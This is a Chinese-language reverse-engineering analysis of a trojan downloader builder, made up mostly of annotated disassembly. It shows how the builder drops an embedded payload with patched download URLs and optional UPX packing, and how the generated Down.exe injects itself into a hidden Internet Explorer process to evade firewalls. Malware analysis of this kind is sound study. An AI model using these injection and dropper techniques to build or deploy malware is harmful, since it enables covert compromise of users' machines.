00455B6C /. 55 push ebp ; 这里是按钮的事件了
00455B6D |. 8BEC mov ebp,esp
00455B6F |. B9 13000000 mov ecx,13
00455B74 |> 6A 00 /push 0
00455B76 |. 6A 00 |push 0
00455B78 |. 49 |dec ecx
00455B79 |.^ 75 F9 \jnz short 1_.00455B74
00455B7B |. 51 push ecx
00455B7C |. 53 push ebx
00455B7D |. 56 push esi
00455B7E |. 57 push edi
00455B7F |. 8BD8 mov ebx,eax
00455B81 |. 33C0 xor eax,eax
00455B83 |. 55 push ebp
00455B84 |. 68 BF614500 push 1_.004561BF ; SE句柄
00455B89 |. 64:FF30 push dword ptr fs:[eax]
00455B8C |. 64:8920 mov dword ptr fs:[eax],esp
00455B8F |. 8D55 D8 lea edx,dword ptr ss:[ebp-28]
00455B92 |. 8B83 10030000 mov eax,dword ptr ds:[ebx+310]
00455B98 |. E8 8BEEFDFF call 1_.00434A28 ;
00455B9D |. 8B45 D8 mov eax,dword ptr ss:[ebp-28] ;第一个输入框的网址到EAX
00455BA0 |. 8D55 DC lea edx,dword ptr ss:[ebp-24]
00455BA3 |. E8 AC21FBFF call 1_.00407D54 ;
00455BA8 |. 837D DC 00 cmp dword ptr ss:[ebp-24],0 ; 测试是否为空
00455BAC |. 75 18 jnz short 1_.00455BC6
00455BAE |. 6A 40 push 40 ; /Style = MB_OK|MB_ICONASTERISK|MB_APPLMODAL
00455BB0 |. 68 D0614500 push 1_.004561D0 ; |Title = "提示信息"
00455BB5 |. 68 DC614500 push 1_.004561DC ; |Text = "必须输入一个下载地址"
00455BBA |. 6A 00 push 0 ; |hOwner = NULL
00455BBC |. E8 5B0BFBFF call <jmp.&user32.MessageBoxA> ; \MessageBoxA
很明显,以上要求我们必须输入一个下载地址
00455BC1 |. E9 5F050000 jmp 1_.00456125
00455BC6 |> 8D55 D4 lea edx,dword ptr ss:[ebp-2C]
00455BC9 |. 8B83 FC020000 mov eax,dword ptr ds:[ebx+2FC]
00455BCF |. E8 54EEFDFF call 1_.00434A28 ; HTTP://WWW.98EXE.COM
00455BD4 |. 8B45 D4 mov eax,dword ptr ss:[ebp-2C]
00455BD7 |. 8B15 3C824500 mov edx,dword ptr ds:[45823C] ; 1_.00457E38
00455BDD |. 8B12 mov edx,dword ptr ds:[edx]
00455BDF |. E8 C0E7FAFF call 1_.004043A4
00455BE4 74 22 je short 1_.00455C08
00455BE6 |. A1 2C814500 mov eax,dword ptr ds:[45812C]
00455BEB |. 8B00 mov eax,dword ptr ds:[eax]
00455BED |. E8 2E2BFDFF call 1_.00428720 ; 程序以被修改,请使用正版
不让你修改程序,就是上面标有 HTTP://WWW.98EXE.COM的label
................................................................................................
省略一些我认为不是很重要的代码
................................................................................................
00455C71 |. 8BC6 mov eax,esi
00455C73 |. E8 E41CFDFF call 1_.0042795C
00455C78 |. 8D46 78 lea eax,dword ptr ds:[esi+78]
00455C7B |. BA FC614500 mov edx,1_.004561FC ; ASCII "Down.exe"
00455C80 |. E8 67E3FAFF call 1_.00403FEC ; 设置默认文件名
00455C85 |. 8D46 74 lea eax,dword ptr ds:[esi+74]
00455C88 |. BA 10624500 mov edx,1_.00456210 ; ASCII "exe"
00455C8D |. E8 5AE3FAFF call 1_.00403FEC ; 设置文件过滤器
00455C92 |. 8D46 70 lea eax,dword ptr ds:[esi+70]
00455C95 |. BA 1C624500 mov edx,1_.0045621C
00455C9A |. E8 4DE3FAFF call 1_.00403FEC
00455C9F |. 8BC6 mov eax,esi
00455CA1 |. 8B10 mov edx,dword ptr ds:[eax]
00455CA3 |. FF52 3C call dword ptr ds:[edx+3C] ; 生成木马文件对话框
00455CA6 |. 84C0 test al,al
00455CA8 |. 0F84 77040000 je 1_.00456125
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
省略一些我认为不是很重要的代码
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
00455E06 |. 6A 0A push 0A ; /ResourceType = RT_RCDATA
00455E08 |. 68 38624500 push 1_.00456238 ; |ResourceName = "HOOKMM"
00455E0D |. A1 64964500 mov eax,dword ptr ds:[459664] ; |
00455E12 |. 50 push eax ; |hModule => NULL
00455E13 |. E8 B401FBFF call <jmp.&kernel32.FindResourceA> ; \FindResourceA
FindResource(NULL,"HOOKMM",RT_RCDATA)查找ID为HOOKMM的资源。
00455E18 |. 8BF0 mov esi,eax
00455E1A |. 85F6 test esi,esi
00455E1C |. 0F84 03030000 je 1_.00456125
00455E22 |. 56 push esi ; /hResource
00455E23 |. A1 64964500 mov eax,dword ptr ds:[459664] ; |
00455E28 |. 50 push eax ; |hModule => NULL
00455E29 |. E8 1E03FBFF call <jmp.&kernel32.SizeofResource> ; \SizeofResource
SizeofResource返回资源大小
00455E2E |. 8945 F8 mov dword ptr ss:[ebp-8],eax ; 4A00
00455E31 |. 837D F8 00 cmp dword ptr ss:[ebp-8],0
00455E35 |. 0F84 EA020000 je 1_.00456125
00455E3B |. 56 push esi ; /hResource=47c820
00455E3C |. A1 64964500 mov eax,dword ptr ds:[459664] ; |
00455E41 |. 50 push eax ; |hModule => NULL
00455E42 |. E8 AD02FBFF call <jmp.&kernel32.LoadResource> ; \LoadResource
将资源载入内存
00455E47 |. 85C0 test eax,eax
00455E49 |. 0F84 D6020000 je 1_.00456125
00455E4F |. 50 push eax ; /hResource
00455E50 |. E8 A702FBFF call <jmp.&kernel32.LockResource> ; \LockResource
锁定资源
00455E55 |. 8945 FC mov dword ptr ss:[ebp-4],eax
00455E58 |. 837D FC 00 cmp dword ptr ss:[ebp-4],0
00455E5C |. 0F84 C3020000 je 1_.00456125
00455E62 |. 6A 00 push 0 ; /hTemplateFile = NULL
00455E64 |. 68 80000000 push 80 ; |Attributes = NORMAL
00455E69 |. 6A 02 push 2 ; |Mode = CREATE_ALWAYS
00455E6B |. 6A 00 push 0 ; |pSecurity = NULL
00455E6D |. 6A 02 push 2 ; |ShareMode = FILE_SHARE_WRITE
00455E6F |. 68 00000040 push 40000000 ; |Access = GENERIC_WRITE
00455E74 |. 57 push edi ; |FileName
00455E75 |. E8 2201FBFF call <jmp.&kernel32.CreateFileA> ; \CreateFileA
创建文件DOWN.EXE
00455E7A |. 8BF0 mov esi,eax
00455E7C |. 83FE FF cmp esi,-1
00455E7F |. 0F84 A0020000 je 1_.00456125
00455E85 |. 6A 00 push 0 ; /pOverlapped = NULL
00455E87 |. 8D45 F4 lea eax,dword ptr ss:[ebp-C] ; |
00455E8A |. 50 push eax ; |pBytesWritten
00455E8B |. 8B45 F8 mov eax,dword ptr ss:[ebp-8] ; |
00455E8E |. 50 push eax ; |nBytesToWrite=4a00
00455E8F |. 8B45 FC mov eax,dword ptr ss:[ebp-4] ; |
00455E92 |. 50 push eax ; |Buffer
00455E93 |. 56 push esi ; |hFile
00455E94 |. E8 DB02FBFF call <jmp.&kernel32.WriteFile> ; \WriteFile
写文件
00455E99 |. 6A 0A push 0A ; /Timeout = 10. ms
00455E9B |. E8 146BFBFF call <jmp.&kernel32.Sleep> ; \Sleep
延时10MS
00455EA0 |. 6A 00 push 0 ; /Origin = FILE_BEGIN
00455EA2 |. 6A 00 push 0 ; |pOffsetHi = NULL
00455EA4 |. 68 CC2A0000 push 2ACC ; |OffsetLo = 2ACC (10956.)
00455EA9 |. 56 push esi ; |hFile
00455EAA |. E8 8D02FBFF call <jmp.&kernel32.SetFilePointer> ; \SetFilePointer
把文件指针移动到2ACC处。
00455EAF |. 8B45 F0 mov eax,dword ptr ss:[ebp-10] ; 取第1个网页下载地址
00455EB2 |. E8 A1E3FAFF call 1_.00404258 ;这个CALL返回地址的长度
00455EB7 |. BA 40000000 mov edx,40
00455EBC |. 2BD0 sub edx,eax
00455EBE |. 8D4D 88 lea ecx,dword ptr ss:[ebp-78]
00455EC1 |. 33C0 xor eax,eax
00455EC3 |. E8 80E7FAFF call 1_.00404648
00455EC8 |. 8B4D 88 mov ecx,dword ptr ss:[ebp-78]
00455ECB |. 8D45 8C lea eax,dword ptr ss:[ebp-74]
00455ECE |. 8B55 F0 mov edx,dword ptr ss:[ebp-10]
00455ED1 |. E8 CEE3FAFF call 1_.004042A4
00455ED6 |. 8B45 8C mov eax,dword ptr ss:[ebp-74]
00455ED9 |. E8 7AE5FAFF call 1_.00404458
00455EDE |. 6A 00 push 0 ; /pOverlapped = NULL
00455EE0 |. 8D55 F4 lea edx,dword ptr ss:[ebp-C] ; |
00455EE3 |. 52 push edx ; |pBytesWritten
00455EE4 |. 6A 41 push 41 ; |nBytesToWrite = 41 (65.)
00455EE6 |. 50 push eax ; |buffer=http://1111111/*.*.exe
00455EE7 |. 56 push esi ; |hFile
00455EE8 |. E8 8702FBFF call <jmp.&kernel32.WriteFile> ; \WriteFile
把第1个网页下载地址写入前面创建的文件当中
00455EED |. 6A 00 push 0 ; /Origin = FILE_BEGIN
00455EEF |. 6A 00 push 0 ; |pOffsetHi = NULL
00455EF1 |. 68 182B0000 push 2B18 ; |OffsetLo = 2B18 (11032.)
00455EF6 |. 56 push esi ; |hFile
00455EF7 |. E8 4002FBFF call <jmp.&kernel32.SetFilePointer> ; \SetFilePointer
把文件指针移动到2B18处。。。。
00455EFC |. 6A 00 push 0 ; /Origin = FILE_BEGIN
00455EFE |. 6A 00 push 0 ; |pOffsetHi = NULL
00455F00 |. 68 102B0000 push 2B10 ; |OffsetLo = 2B10 (11024.)
00455F05 |. 56 push esi ; |hFile
00455F06 |. E8 3102FBFF call <jmp.&kernel32.SetFilePointer> ; \SetFilePointer
把文件指针移动到2B10处。。。。
00455F0B |. 8B45 EC mov eax,dword ptr ss:[ebp-14] ; 取第2个网页下载地址
00455F0E |. E8 45E3FAFF call 1_.00404258 ; 返回长度(不包括http://)
00455F13 |. BA 40000000 mov edx,40
00455F18 |. 2BD0 sub edx,eax ;
00455F1A |. 8D4D 80 lea ecx,dword ptr ss:[ebp-80]
00455F1D |. 33C0 xor eax,eax
00455F1F |. E8 24E7FAFF call 1_.00404648
00455F24 |. 8B4D 80 mov ecx,dword ptr ss:[ebp-80]
00455F27 |. 8D45 84 lea eax,dword ptr ss:[ebp-7C]
00455F2A |. 8B55 EC mov edx,dword ptr ss:[ebp-14]
00455F2D |. E8 72E3FAFF call 1_.004042A4
00455F32 |. 8B45 84 mov eax,dword ptr ss:[ebp-7C] ;
00455F35 |. E8 1EE5FAFF call 1_.00404458
00455F3A |. 6A 00 push 0 ; /pOverlapped = NULL
00455F3C |. 8D55 F4 lea edx,dword ptr ss:[ebp-C] ; |
00455F3F |. 52 push edx ; |pBytesWritten
00455F40 |. 6A 41 push 41 ; |nBytesToWrite = 41 (65.)
00455F42 |. 50 push eax ; |Buffer
00455F43 |. 56 push esi ; |hFile
00455F44 |. E8 2B02FBFF call <jmp.&kernel32.WriteFile> ; \WriteFile
把你输入的第2个网址写入到文件中,指针移动间隔相差8byte,正好是http;//的长度.如果你用二进制工具打开程序,你会发现在指针移动到的位置有
CXXXXXXXXXXXXXXXXXXXXXXXXXXXXX,DXXXXXXXXX。。。之类的。
00455F49 |. 6A 00 push 0 ; /Origin = FILE_BEGIN
00455F4B |. 6A 00 push 0 ; |pOffsetHi = NULL
00455F4D |. 68 5C2B0000 push 2B5C ; |OffsetLo = 2B5C (11100.)
00455F52 |. 56 push esi ; |hFile
00455F53 |. E8 E401FBFF call <jmp.&kernel32.SetFilePointer> ; \SetFilePointer
00455F58 |. 6A 00 push 0 ; /Origin = FILE_BEGIN
00455F5A |. 6A 00 push 0 ; |pOffsetHi = NULL
00455F5C |. 68 542B0000 push 2B54 ; |OffsetLo = 2B54 (11092.)
00455F61 |. 56 push esi ; |hFile
00455F62 |. E8 D501FBFF call <jmp.&kernel32.SetFilePointer> ; \SetFilePointer
00455F67 |. 8B45 E8 mov eax,dword ptr ss:[ebp-18]
00455F6A |. E8 E9E2FAFF call 1_.00404258
00455F6F |. BA 40000000 mov edx,40
00455F74 |. 2BD0 sub edx,eax
00455F76 |. 8D8D 78FFFFFF lea ecx,dword ptr ss:[ebp-88]
00455F7C |. 33C0 xor eax,eax
00455F7E |. E8 C5E6FAFF call 1_.00404648
00455F83 |. 8B8D 78FFFFFF mov ecx,dword ptr ss:[ebp-88]
00455F89 |. 8D85 7CFFFFFF lea eax,dword ptr ss:[ebp-84]
00455F8F |. 8B55 E8 mov edx,dword ptr ss:[ebp-18]
00455F92 |. E8 0DE3FAFF call 1_.004042A4
00455F97 |. 8B85 7CFFFFFF mov eax,dword ptr ss:[ebp-84]
00455F9D |. E8 B6E4FAFF call 1_.00404458
00455FA2 |. 6A 00 push 0 ; /pOverlapped = NULL
00455FA4 |. 8D55 F4 lea edx,dword ptr ss:[ebp-C] ; |
00455FA7 |. 52 push edx ; |pBytesWritten
00455FA8 |. 6A 41 push 41 ; |nBytesToWrite = 41 (65.)
00455FAA |. 50 push eax ; |Buffer
00455FAB |. 56 push esi ; |hFile
00455FAC |. E8 C301FBFF call <jmp.&kernel32.WriteFile> ; \WriteFile
00455FB1 |. 6A 00 push 0 ; /Origin = FILE_BEGIN
00455FB3 |. 6A 00 push 0 ; |pOffsetHi = NULL
00455FB5 |. 68 A02B0000 push 2BA0 ; |OffsetLo = 2BA0 (11168.)
00455FBA |. 56 push esi ; |hFile
00455FBB |. E8 7C01FBFF call <jmp.&kernel32.SetFilePointer> ; \SetFilePointer
00455FC0 |. 6A 00 push 0 ; /Origin = FILE_BEGIN
00455FC2 |. 6A 00 push 0 ; |pOffsetHi = NULL
00455FC4 |. 68 982B0000 push 2B98 ; |OffsetLo = 2B98 (11160.)
00455FC9 |. 56 push esi ; |hFile
00455FCA |. E8 6D01FBFF call <jmp.&kernel32.SetFilePointer> ; \SetFilePointer
00455FCF |. 8B45 E4 mov eax,dword ptr ss:[ebp-1C]
00455FD2 |. E8 81E2FAFF call 1_.00404258
00455FD7 |. BA 40000000 mov edx,40
00455FDC |. 2BD0 sub edx,eax
00455FDE |. 8D8D 70FFFFFF lea ecx,dword ptr ss:[ebp-90]
00455FE4 |. 33C0 xor eax,eax
00455FE6 |. E8 5DE6FAFF call 1_.00404648
00455FEB |. 8B8D 70FFFFFF mov ecx,dword ptr ss:[ebp-90]
00455FF1 |. 8D85 74FFFFFF lea eax,dword ptr ss:[ebp-8C]
00455FF7 |. 8B55 E4 mov edx,dword ptr ss:[ebp-1C]
00455FFA |. E8 A5E2FAFF call 1_.004042A4
00455FFF |. 8B85 74FFFFFF mov eax,dword ptr ss:[ebp-8C]
00456005 |. E8 4EE4FAFF call 1_.00404458
0045600A |. 6A 00 push 0 ; /pOverlapped = NULL
0045600C |. 8D55 F4 lea edx,dword ptr ss:[ebp-C] ; |
0045600F |. 52 push edx ; |pBytesWritten
00456010 |. 6A 41 push 41 ; |nBytesToWrite = 41 (65.)
00456012 |. 50 push eax ; |Buffer
00456013 |. 56 push esi ; |hFile
00456014 |. E8 5B01FBFF call <jmp.&kernel32.WriteFile> ; \WriteFile
00456019 |. 6A 00 push 0 ; /Origin = FILE_BEGIN
0045601B |. 6A 00 push 0 ; |pOffsetHi = NULL
0045601D |. 68 E42B0000 push 2BE4 ; |OffsetLo = 2BE4 (11236.)
00456022 |. 56 push esi ; |hFile
00456023 |. E8 1401FBFF call <jmp.&kernel32.SetFilePointer> ; \SetFilePointer
00456028 |. 6A 00 push 0 ; /Origin = FILE_BEGIN
0045602A |. 6A 00 push 0 ; |pOffsetHi = NULL
0045602C |. 68 DC2B0000 push 2BDC ; |OffsetLo = 2BDC (11228.)
00456031 |. 56 push esi ; |hFile
00456032 |. E8 0501FBFF call <jmp.&kernel32.SetFilePointer> ; \SetFilePointer
00456037 |. 8B45 E0 mov eax,dword ptr ss:[ebp-20]
0045603A |. E8 19E2FAFF call 1_.00404258
0045603F |. BA 40000000 mov edx,40
00456044 |. 2BD0 sub edx,eax
00456046 |. 8D8D 68FFFFFF lea ecx,dword ptr ss:[ebp-98]
0045604C |. 33C0 xor eax,eax
0045604E |. E8 F5E5FAFF call 1_.00404648
00456053 |. 8B8D 68FFFFFF mov ecx,dword ptr ss:[ebp-98]
00456059 |. 8D85 6CFFFFFF lea eax,dword ptr ss:[ebp-94]
0045605F |. 8B55 E0 mov edx,dword ptr ss:[ebp-20]
00456062 |. E8 3DE2FAFF call 1_.004042A4
00456067 |. 8B85 6CFFFFFF mov eax,dword ptr ss:[ebp-94]
0045606D |. E8 E6E3FAFF call 1_.00404458
00456072 |. 6A 00 push 0 ; /pOverlapped = NULL
00456074 |. 8D55 F4 lea edx,dword ptr ss:[ebp-C] ; |
00456077 |. 52 push edx ; |pBytesWritten
00456078 |. 6A 41 push 41 ; |nBytesToWrite = 41 (65.)
0045607A |. 50 push eax ; |Buffer
0045607B |. 56 push esi ; |hFile
0045607C |. E8 F300FBFF call <jmp.&kernel32.WriteFile> ; \WriteFile
00456081 |. 6A 00 push 0 ; /Origin = FILE_BEGIN
00456083 |. 6A 00 push 0 ; |pOffsetHi = NULL
00456085 |. 68 282C0000 push 2C28 ; |OffsetLo = 2C28 (11304.)
0045608A |. 56 push esi ; |hFile
0045608B |. E8 AC00FBFF call <jmp.&kernel32.SetFilePointer> ; \SetFilePointer
00456090 |. 56 push esi ; /hObject
00456091 |. E8 EEFEFAFF call <jmp.&kernel32.CloseHandle> ; \CloseHandle
00456096 |. 6A 40 push 40 ; /Style = MB_OK|MB_ICONASTERISK|MB_APPLMODAL
00456098 |. 68 40624500 push 1_.00456240 ; |Title = "提示"
0045609D |. 68 48624500 push 1_.00456248 ; |Text = "配置文件成功"
004560A2 |. 6A 00 push 0 ; |hOwner = NULL
004560A4 |. E8 7306FBFF call <jmp.&user32.MessageBoxA> ; \MessageBoxA
=====================================================================================================
刚开始分析的时候,我不知道该怎么提取这个HOOKMM这个资源,用资源黑客提示被压缩的,后来仔细想了想。这个HOOKMM应该是
我们生成的DOWN.EXE,按照这个思路,那程序的作用就是把HOOKMM这个资源写入DOWN.EXE中,然后把我们输入的地址写入文件,
到这里我的思路就豁然开朗了,我想你也是一样吧
=====================================================================================================
004560A9 |. 8B83 04030000 mov eax,dword ptr ds:[ebx+304]
004560AF |. 8B10 mov edx,dword ptr ds:[eax]
004560B1 |. FF92 C8000000 call dword ptr ds:[edx+C8]
004560B7 |. 84C0 test al,al
004560B9 |. 74 6A je short 1_.00456125
004560BB |. B9 60624500 mov ecx,1_.00456260 ; ASCII "Upack.bat"
004560C0 |. BA 74624500 mov edx,1_.00456274 ; ASCII "UPXKMM"
004560C5 |. B8 84624500 mov eax,1_.00456284 ; ASCII "RCDUPX"
004560CA |. E8 8DF9FFFF call 1_.00455A5C
004560CF |. 84C0 test al,al ; 是否选了压缩
////////////////////////////////////////////////////////////////////////////////////////////////////
下面的代码我就不分析了,思维发散一下,我们可以在CMD下这样使用UPX:“UPX.EXE 参数,目标文件名”
所以我估计程序也是把UPX.exe当资源读入文件,选择了压缩就生成UPX.EXE和一个UNPACK.BAT(都设置成隐藏属性),然后执行这个批处理
UNPACK,BAT内容也许是这样的:
UPX.EXE 参数,目标文件名
del upx.exe
del %1
////////////////////////////////////////////////////////////////////////////////////////////////////
004560D1 |. 74 52 je short 1_.00456125
004560D3 |. 6A 06 push 6
004560D5 |. 6A 00 push 0
004560D7 |. 68 94624500 push 1_.00456294
004560DC |. FF35 0C9C4500 push dword ptr ds:[459C0C]
004560E2 |. 68 94624500 push 1_.00456294
004560E7 |. 8D85 64FFFFFF lea eax,dword ptr ss:[ebp-9C]
004560ED |. BA 03000000 mov edx,3
004560F2 |. E8 21E2FAFF call 1_.00404318
004560F7 |. 8B85 64FFFFFF mov eax,dword ptr ss:[ebp-9C]
004560FD |. E8 56E3FAFF call 1_.00404458
00456102 |. 50 push eax ; |Parameters
00456103 |. 68 98624500 push 1_.00456298 ; |FileName = "Upack.bat"
00456108 |. 6A 00 push 0 ; |Operation = NULL
0045610A |. 6A 00 push 0 ; |hWnd = NULL
0045610C |. E8 1702FDFF call <jmp.&shell32.ShellExecuteA> ; \ShellExecuteA
00456111 |. 68 E8030000 push 3E8 ; /Timeout = 1000. ms
00456116 |. E8 9968FBFF call <jmp.&kernel32.Sleep> ; \Sleep
0045611B |. B8 60624500 mov eax,1_.00456260 ; ASCII "Upack.bat
有了上面的想法,我就接着分析生成的DOWN.EXE。。。。
生成了DOWN.exe
13143A24 Dow> $ 55 push ebp
13143A25 . 8BEC mov ebp,esp
13143A27 . 81C4 F0FEFFFF add esp,-110
13143A2D . B8 EC391413 mov eax,Down.131439EC
13143A32 . E8 81F9FFFF call Down.131433B8
13143A37 . 8D85 F0FEFFFF lea eax,dword ptr ss:[ebp-110]
13143A3D . 8B15 A0401413 mov edx,dword ptr ds:[131440A0] ; 网址
13143A43 . E8 80ECFFFF call Down.131426C8 ; 测试你输入的网址
13143A48 . 8D85 F0FEFFFF lea eax,dword ptr ss:[ebp-110]
13143A4E . BA 503B1413 mov edx,Down.13143B50
13143A53 . 33C9 xor ecx,ecx
13143A55 . 8A08 mov cl,byte ptr ds:[eax]
13143A57 . 41 inc ecx
13143A58 . E8 27EBFFFF call Down.13142584
13143A5D . 74 0F je short Down.13143A6E
13143A5F . A1 A0401413 mov eax,dword ptr ds:[131440A0]
13143A64 . A3 78561413 mov dword ptr ds:[13145678],eax
13143A69 . E8 B6FEFFFF call Down.13143924 ; 跟进
{
13143924 /$ 55 push ebp
13143925 |. 8BEC mov ebp,esp
13143927 |. 83C4 F8 add esp,-8
1314392A |. 53 push ebx
1314392B |. 33C0 xor eax,eax
1314392D |. 8945 F8 mov dword ptr ss:[ebp-8],eax
13143930 |. 33C0 xor eax,eax
13143932 |. 55 push ebp
13143933 |. 68 B0391413 push Down.131439B0
13143938 |. 64:FF30 push dword ptr fs:[eax]
1314393B |. 64:8920 mov dword ptr fs:[eax],esp
1314393E |. 6A 00 push 0
13143940 |. 8D45 F8 lea eax,dword ptr ss:[ebp-8]
13143943 |. E8 E4FBFFFF call Down.1314352C ;
跟近这个CALL你会发现程序会到 "Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE"这个键下取IE的完整路径。
13143948 |. 8B45 F8 mov eax,dword ptr ss:[ebp-8] ; iexplorer.exe的完整路径到EAX
1314394B |. E8 18F7FFFF call Down.13143068 ;
13143950 |. 50 push eax ; |CmdLine
13143951 |. E8 7EFBFFFF call <jmp.&kernel32.WinExec> ; \WinExec
WINECEX("c:\..\iexplorer.exe",SW_HIDE)隐藏执行iexplorer.exe
13143956 |. 68 F4010000 push 1F4 ; /Timeout = 500. ms
1314395B |. E8 5CFBFFFF call <jmp.&kernel32.Sleep> ; \Sleep
Slees(1f4),延时500ms
13143960 |. 8D45 FC lea eax,dword ptr ss:[ebp-4]
13143963 |. 50 push eax ; /pProcessID
13143964 |. 6A 00 push 0 ; |/Title = NULL
13143966 |. 68 BC391413 push Down.131439BC ; ||Class = "IEFrame"
1314396B |. E8 74FBFFFF call <jmp.&user32.FindWindowA> ; |\FindWindowA
13143970 |. 50 push eax ; |hWnd
13143971 |. E8 76FBFFFF call <jmp.&user32.GetWindowThreadProcessId> ; \GetWindowThreadProcessId
先FindWindowA(NULL,"IEFrame")获得IE句柄,然后GetWindowThreadProcessId取得其进程ID
13143976 |. 8B45 FC mov eax,dword ptr ss:[ebp-4]
13143979 |. 50 push eax ; /ProcessId
1314397A |. 6A 00 push 0 ; |Inheritable = FALSE
1314397C |. 68 FF0F1F00 push 1F0FFF ; |Access = PROCESS_ALL_ACCESS
13143981 |. E8 2EFBFFFF call <jmp.&kernel32.OpenProcess> ; \OpenProcess
OpenProcess打开进程,这个函数将返回进程句柄
13143986 |. 8BD8 mov ebx,eax
13143988 |. BA 20381413 mov edx,Down.13143820
1314398D |. 8BC3 mov eax,ebx
1314398F |. E8 9CFCFFFF call Down.13143630 ; 这里注入IE
{
13143630 /$ 53 push ebx
13143631 |. 56 push esi
13143632 |. 57 push edi
13143633 |. 55 push ebp
13143634 |. 83C4 F8 add esp,-8
13143637 |. 8BEA mov ebp,edx
13143639 |. 8BF0 mov esi,eax
1314363B |. 6A 00 push 0 ; /pModule = NULL
1314363D |. E8 5AFEFFFF call <jmp.&kernel32.GetModuleHandleA> ; \GetModuleHandleA
取得当前应用程序的句柄
13143642 |. 8BD8 mov ebx,eax
13143644 |. 8B43 3C mov eax,dword ptr ds:[ebx+3C]
13143647 |. 03C3 add eax,ebx
13143649 |. 83C0 04 add eax,4
1314364C |. 83C0 14 add eax,14
1314364F |. 8B78 38 mov edi,dword ptr ds:[eax+38]
13143652 |. 68 00800000 push 8000
13143657 |. 6A 00 push 0
13143659 |. 53 push ebx
1314365A |. 56 push esi
1314365B |. E8 6CFEFFFF call <jmp.&kernel32.VirtualFreeEx>
13143660 |. 6A 40 push 40
13143662 |. 68 00300000 push 3000
13143667 |. 57 push edi
13143668 |. 53 push ebx
13143669 |. 56 push esi
1314366A |. E8 55FEFFFF call <jmp.&kernel32.VirtualAllocEx>
在IE进程内申请相应的内存空间
1314366F |. 54 push esp ; /pBytesWritten
13143670 |. 57 push edi ; |BytesToWrite
13143671 |. 53 push ebx ; |Buffer
13143672 |. 50 push eax ; |Address
13143673 |. 56 push esi ; |hProcess
13143674 |. E8 63FEFFFF call <jmp.&kernel32.WriteProcessMemory> ; \WriteProcessMemory
把代码写到内存
13143679 |. 8D4424 04 lea eax,dword ptr ss:[esp+4]
1314367D |. 50 push eax
1314367E |. 6A 00 push 0
13143680 |. 53 push ebx
13143681 |. 55 push ebp
13143682 |. 6A 00 push 0
13143684 |. 6A 00 push 0
13143686 |. 56 push esi
13143687 |. E8 00FEFFFF call <jmp.&kernel32.CreateRemoteThread>
创建一个线程执行代码
1314368C |. 59 pop ecx
1314368D |. 5A pop edx
1314368E |. 5D pop ebp
1314368F |. 5F pop edi
13143690 |. 5E pop esi
13143691 |. 5B pop ebx
13143692 \. C3 retn
}
13143994 |. 53 push ebx ; /hObject
13143995 |. E8 EAFAFFFF call <jmp.&kernel32.CloseHandle> ; \CloseHandle
1314399A |. 33C0 xor eax,eax
1314399C |. 5A pop edx
1314399D |. 59 pop ecx
1314399E |. 59 pop ecx
1314399F |. 64:8910 mov dword ptr fs:[eax],edx
131439A2 |. 68 B7391413 push Down.131439B7
131439A7 |> 8D45 F8 lea eax,dword ptr ss:[ebp-8]
131439AA |. E8 DDF5FFFF call Down.13142F8C
131439AF \. C3 retn
}
,原来上兴下载者是通过注入IE进程达到穿墙的目的的。。下面的代码都一样的,你填写了多少个地址就会有相应的线程。。。。。
13143A6E > 8D85 F0FEFFFF lea eax,dword ptr ss:[ebp-110]
13143A74 . 8B15 A4401413 mov edx,dword ptr ds:[131440A4] ; 你填写的第2个
13143A7A . E8 49ECFFFF call Down.131426C8
13143A7F . 8D85 F0FEFFFF lea eax,dword ptr ss:[ebp-110]
13143A85 . BA 503B1413 mov edx,Down.13143B50
13143A8A . 33C9 xor ecx,ecx
13143A8C . 8A08 mov cl,byte ptr ds:[eax]
13143A8E . 41 inc ecx
13143A8F . E8 F0EAFFFF call Down.13142584
13143A94 . 74 0F je short Down.13143AA5
13143A96 . A1 A4401413 mov eax,dword ptr ds:[131440A4]
13143A9B . A3 78561413 mov dword ptr ds:[13145678],eax
13143AA0 . E8 7FFEFFFF call Down.13143924
13143AA5 > 8D85 F0FEFFFF lea eax,dword ptr ss:[ebp-110]
13143AAB . 8B15 A8401413 mov edx,dword ptr ds:[131440A8] ; Down.13143754
13143AB1 . E8 12ECFFFF call Down.131426C8
13143AB6 . 8D85 F0FEFFFF lea eax,dword ptr ss:[ebp-110]
13143ABC . BA 503B1413 mov edx,Down.13143B50
13143AC1 . 33C9 xor ecx,ecx
13143AC3 . 8A08 mov cl,byte ptr ds:[eax]
13143AC5 . 41 inc ecx
13143AC6 . E8 B9EAFFFF call Down.13142584
13143ACB . 74 0F je short Down.13143ADC
13143ACD . A1 A8401413 mov eax,dword ptr ds:[131440A8]
13143AD2 . A3 78561413 mov dword ptr ds:[13145678],eax
13143AD7 . E8 48FEFFFF call Down.13143924
13143ADC > 8D85 F0FEFFFF lea eax,dword ptr ss:[ebp-110]
13143AE2 . 8B15 AC401413 mov edx,dword ptr ds:[131440AC] ; Down.13143798
13143AE8 . E8 DBEBFFFF call Down.131426C8
13143AED . 8D85 F0FEFFFF lea eax,dword ptr ss:[ebp-110]
13143AF3 . BA 503B1413 mov edx,Down.13143B50
13143AF8 . 33C9 xor ecx,ecx
13143AFA . 8A08 mov cl,byte ptr ds:[eax]
13143AFC . 41 inc ecx
13143AFD . E8 82EAFFFF call Down.13142584
13143B02 . 74 0F je short Down.13143B13
13143B04 . A1 AC401413 mov eax,dword ptr ds:[131440AC]
13143B09 . A3 78561413 mov dword ptr ds:[13145678],eax
13143B0E . E8 11FEFFFF call Down.13143924
13143B13 > 8D85 F0FEFFFF lea eax,dword ptr ss:[ebp-110]
13143B19 . 8B15 B0401413 mov edx,dword ptr ds:[131440B0] ; Down.131437DC
13143B1F . E8 A4EBFFFF call Down.131426C8
13143B24 . 8D85 F0FEFFFF lea eax,dword ptr ss:[ebp-110]
13143B2A . BA 503B1413 mov edx,Down.13143B50
13143B2F . 33C9 xor ecx,ecx
13143B31 . 8A08 mov cl,byte ptr ds:[eax]
13143B33 . 41 inc ecx
13143B34 . E8 4BEAFFFF call Down.13142584
13143B39 . 74 0F je short Down.13143B4A
13143B3B . A1 B0401413 mov eax,dword ptr ds:[131440B0]
13143B40 . A3 78561413 mov dword ptr ds:[13145678],eax
13143B45 . E8 DAFDFFFF call Down.13143924
13143B4A > E8 4DF3FFFF call Down.13142E9C
